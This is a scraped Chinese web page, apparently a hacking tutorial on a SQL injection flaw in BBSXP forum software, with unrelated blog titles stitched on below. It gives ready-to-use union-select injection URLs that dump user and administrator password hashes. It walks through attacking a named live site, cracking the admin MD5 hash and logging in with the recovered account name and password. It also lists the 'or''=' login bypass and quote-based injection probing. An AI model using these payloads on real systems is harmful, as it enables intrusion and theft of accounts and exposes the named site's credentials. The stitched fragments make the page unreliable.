BBSXP最新漏洞 简单注入检測 万能password

BBSXP最新漏洞

漏洞日期:2005年7月1日
受害版本号:眼下全部BBSXP
漏洞利用:
查前台password注入语句:
blog.asp?id=1%20union%20select%201,1,userpass,username,1,1,1%20from%20[user]%20where%20membercode=5
查后台password注入语句:
blog.asp?id=1%20union%20select%201,1,adminpassword,username,1,1,1%20from%20[user]%20where%20membercode=5

首先打开www.google.com在输入Po......bBsxp5.15有非常多这种论坛,随便点个,好就这个bbs.yuntea.com 真幸运,这个站还没打上补丁,一口做气杀究竟,bbsxp5.15最新漏洞 
漏洞主要出在BLOG.ASP 能够让直接构造数据库命令  
blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 
后台区长的md5password就显示出来了。 
前台password也能够出来, 
网上已经有相关动画,软件。 
就利用这个漏洞,肯定有一批bbsxp的站点要倒下了 
接下来就是讲工具了,准备好MD5password破解器 
关于md5的破解,比較好使的有md5cracker速度增强版。 
1。先用8位或9位数字跑。非常快。 
2。假设不行,用小写字母跑。选择5-6位比較好。 
3。再不行,说明password可能使字母加数字,能够碰碰运气。能够配置一个精品自典,比方10G的, 
   跑上及几个小时。(你的机器配置必须非常好) 
4。再不行,建议放弃,太变态了。 
前台ok...后台password..(注:你必须知道管理员的帐号) 
直接默认的配置就是直接拿下后台password... 
直接吧前台md5password暴出来。 
剩下的事就事破解md5了。 
如今開始进行工作了,在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig
就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig
他的password是7CB2BE65EB9F215215A0725A10B6E39E可能前台的password和后台一样,假设有2个加密password那就是代表1个是前台的一个是后台的,不多说了,看操作 
依照上面工具的介绍先用数字把, 
正在破===耐心等等 
我接条信息,大家不介意把~ 
出来了,password是82246124,登入,,他的帐号是wzwu,password82246124,登入成功,后台登入,password82246124,登入成功,以下的因该知道把,我也就不多说了,以免遭到人家的痛骂。 
bBsxp5.15最新漏洞的原始作者不清

74D2710BD75C06A057E842C8CA55C576

名‘or‘‘=‘password也是‘or‘‘=‘
 ‘
一般ASP系统都有相似以下的URL:http://www.xxx.com/xxx.ASP?ID=××,我们仅仅往在这种URL后加上一个单引號,假设返回server错误信息,那么就说明了程序并没有过滤单引號,并且从返回的错误信息中的了能够得到server的一些相关配置信息。接着接交http:/www.xxx.com/xxx.asp?id=××
      and 1=1、http:/www.xxx.com/xx.asp?id=×× and
      1=2,假设返回的页面不一样,说明页面能够注入。

时间: 2024-10-12 21:34:15

BBSXP最新漏洞 简单注入检測 万能password的相关文章

LeakCanary:简单粗暴的内存泄漏检測工具

差点儿每一个程序猿在开发的过程中都会遇到内存泄漏.那么我们怎样检測到app是否哪里出现内存泄漏呢?square公司推出了一款简单粗暴的检測内存泄漏的工具-- LeakCanary 什么是内存泄漏? 内存泄漏是指因为疏忽或者错误造成程序未能释放已经不再使用的内存,内存泄漏不是指内存在物理上的消失,而是应用程序分配某段内存后,因为设计错误失去了对于这段内存的控制.因而造成内存的浪费. 内存泄漏和内存溢出是两码事,不要混淆,内存溢出通俗的讲就是内存不够用,如今的仅仅能手机内存越来越大,内存溢出的情况不

从头认识Spring-3.8 简单的AOP日志实现(注解版)-扩展添加检查订单功能,以便记录并检測输入的參数

这一章节我们讨论一下扩展添加检查订单功能,以便记录并检測输入的參数. 1.domain 蛋糕类: package com.raylee.my_new_spring.my_new_spring.ch03.topic_1_8; public class Cake { private String name = ""; public String getName() { return name; } public void setName(String name) { this.name =

从头认识Spring-3.4 简单的AOP日志实现-扩展添加检查订单功能,以便记录并检測输入的參数

这一章节我们再上一个章节的基础上加上一个检查订单功能 1.domain 蛋糕类: package com.raylee.my_new_spring.my_new_spring.ch03.topic_1_4; public class Cake { private String name = ""; public String getName() { return name; } public void setName(String name) { this.name = name; }

Unity3D游戏开发之简单的碰撞检測

在"Project"面板中单击"Create"旁边的小三角,选择"javascript"创建一个名为"collision"的js文件.双击它,系统启动Monodevelop来编辑js文件. 清除里面默认创建的代码.写上. function OnCollisionEnter(obj:Collision) { Debug.Log(obj.gameObject.name); } onCollisionEnter函数解释:这个函数是在

Ewebeditor最新漏洞及漏洞大全

Ewebeditor最新漏洞及漏洞大全[收集] 来源:转载作者:佚名时间:2009-06-03 00:04:26 下面文章收集转载于网络:) 算是比較全面的ewebeditor编辑器的漏洞收集,如今的站点大多数用的都是ewebeditor编辑器, 所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找. 漏洞更新日期TM: 2009 2 9日转自zake'S Blog ewebeditor最新漏洞.这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个A

Ewebeditor最新漏洞和漏洞指数

Ewebeditor最新漏洞和漏洞指数[收集] 来源:转载作者:佚名时间:2009-06-03 00:04:26 下面文章收集转载于网络:) 算是比較全面的ewebeditor编辑器的漏洞收集.如今的站点大多数用的都是ewebeditor编辑器, 所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找. 漏洞更新日期TM: 2009 2 9日转自zake'S Blog ewebeditor最新漏洞.这个程序爆漏洞一般都是直接上传的漏洞.首先在本地搭建一个A

你的漏洞真的补了?万能再袭

先声明:拿站凭良心,不要瞎搞,逆天只是讲解一个技术,你们要是瞎搞,自己负责,与我无关! 补漏洞的时候记得两点:1.你所信任的是否安全:2.能否举一反三 看正文:(szwyadmin漏洞:利用cookies和万能密码实现入侵) 谷歌:inurl:szwyadmin/login.asp 比如我在搜索的网站中选了这个网站 http://www.jsxzxy.com/szwyadmin/login.asp 入侵代码:(复制,放到地址栏里面,会弹2个警告框,点确定就ok了) javascript:aler

Linux C 编程内存泄露检測工具(二):memwatch

Memwatch简单介绍 在三种检測工具其中,设置最简单的算是memwatch,和dmalloc一样,它能检測未释放的内存.同一段内存被释放多次.位址存取错误及不当使用未分配之内存区域.请往http://www.linkdata.se/sourcecode.html下载最新版本号的Memwatch. 安装及使用memwatch 非常幸运地,memwatch根本是不须要安装的,由于它仅仅是一组C程序代码,仅仅要在你程序中添?memwatch.h,编译时加上-DMEMWATCH -DMW_STDIO

最新 DEDECMS SQL 注入 0day

4月29日消息:国内安全研究团队“知道创宇”称截获到最新DEDECMS SQL注入0day,DEDECMS官网目前提供下载的最新版5.7也受影响,截止本告警发出时官方尚未给出补丁或解决方案,此漏洞利用简单且dedecms安装之后默认即开启漏洞模块. 知道创宇给出三种临时解决方案: 方案一:临时补丁,需要四步 1.确保您的magic_quotes_gpc = On 开启方式:打开php安装目录中的php.ini,搜索magic_quotes_gpc,将其设置为On 2./plus/carbuyac